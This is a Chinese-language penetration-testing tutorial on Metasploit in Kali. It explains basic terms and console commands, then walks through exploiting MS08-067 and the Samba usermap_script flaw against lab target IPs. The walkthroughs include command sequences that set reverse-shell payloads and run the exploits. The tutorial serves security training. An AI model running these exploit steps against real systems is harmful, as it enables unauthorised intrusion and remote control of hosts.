Kali 渗透测试—Metasploit
Metasploit 并不僅僅是一個(gè)工具軟件,它是為自動(dòng)化實(shí)施經(jīng)典的、常規(guī)的,或復(fù)雜新穎的攻擊提供基礎(chǔ)設(shè)施支持的一個(gè)完整框架平臺(tái)。
Metasploit 中提供了滲透攻擊模塊、攻擊載荷和編碼器來輕易實(shí)施一次滲透攻擊,也可以更近一步編寫執(zhí)行更為復(fù)雜的攻擊技術(shù)。
專業(yè)術(shù)語(yǔ)
-
滲透攻擊(Exploit)
滲透攻擊是指有攻擊者或滲透測(cè)試者利用一個(gè)系統(tǒng)、應(yīng)用或服務(wù)中的安全漏洞,所進(jìn)行的攻擊行為。 -
攻擊載荷(Payload)
攻擊載荷就是我們期望目標(biāo)系統(tǒng)在本滲透攻擊之后去執(zhí)行的代碼,在Metasploit 框架中可以自由地選擇、傳送和植入。 -
Shellcode
Shellcode 是指在滲透攻擊時(shí)作為攻擊載荷運(yùn)行的一組機(jī)器指令。 -
模塊(Module)
一個(gè)模塊是指Metasploit 框架中所使用的一段軟件代碼組件。 -
監(jiān)聽器(Listener)
監(jiān)聽器是Metasploit 中用來等待連入網(wǎng)絡(luò)連接的組件。
目錄
啟動(dòng)MSF
- 命令行
# msfconsole - 圖形界面
# armitage
msf > show exploits
這個(gè)命令會(huì)顯示Metasploit 框架中所有可用的攻擊模塊。
msf > show auxiliary
這個(gè)命令會(huì)顯示所有輔助模塊以及它們的用途。
msf >search xxx
搜索某個(gè)模塊
use xxx
使用某個(gè)模塊
msf > show payloads
顯示出payloads
msf > show options
參數(shù)是保證Metasploit 框架中各個(gè)模塊正確運(yùn)行所需的各種設(shè)置
msf > show targets
Metasploit 的滲透攻擊模塊通常可以列出受到漏洞影響目標(biāo)系統(tǒng)的類型。舉例來說,針對(duì)MS08_067漏洞的攻擊依賴于硬編碼的內(nèi)存地址,所以這個(gè)攻擊僅針對(duì)特定的操作系統(tǒng)版本,且只適用于特定的補(bǔ)丁級(jí)別、語(yǔ)言版本以及安全機(jī)制實(shí)現(xiàn)。
info
顯示本模塊的詳細(xì)信息。
目錄
MS08_067 的利用
環(huán)境說明
@ 攻擊機(jī)
Kali
@ 靶機(jī)
172.18.11.28
相關(guān)命令
# nmap -sT -A --script=smb-vuln-ms08-067.nse -P0 10.10.10.130
# msfconsole 啟動(dòng)metasploit
msf > search ms08-067(是中橫線,不是下劃線)
msf > use exploit/windows/smb/ms08_067_netapi
msf > set payload windows/meterpreter/reverse_tcp (任選其一)
msf > set payload generic/shell_reverse_tcp (任選其一)
msf > show targets
msf > set target 7(選擇window XP SP3)
msf > show options
msf > set RHOST 目標(biāo)IP
msf > set LHOST 本機(jī)IP
msf > set LPORT 本機(jī)端口未被占用
msf > exploit
遠(yuǎn)程溢出Samba
環(huán)境說明
@ 攻擊機(jī)
Kali
@ 靶機(jī)
10.10.10.254
相關(guān)命令
msf > use exploit/multi/samba/usermap_script
msf > show options
msf > set RHOST 目標(biāo)地址
msf > exploit
總結(jié)
以上是生活随笔為你收集整理的Kali 渗透测试—Metasploit的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: netcat的使用
- 下一篇: empire-web可视化